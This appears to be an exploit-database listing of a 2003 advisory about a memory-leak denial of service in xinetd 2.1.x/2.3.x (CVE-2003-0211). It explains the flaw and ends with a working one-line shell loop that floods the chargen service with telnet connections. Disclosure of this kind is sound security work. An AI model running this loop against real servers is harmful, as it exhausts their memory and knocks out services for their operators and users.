Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service



EKU-ID: 27986 CVE: CVE-2003-0211;OSVDB-12125 OSVDB-ID:
Author: Steve Grubb Published: 2003-04-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/7382/info

A denial of service vulnerability has been reported for Xinetd. The vulnerability exists due to memory leaks occuring when connections are rejected.

Numerous, repeated connections to a vulnerable Xinetd server will result in the consumption of all available memory resources thereby causing a denial of service condition.

while true; do telnet localhost chargen < /dev/null; done;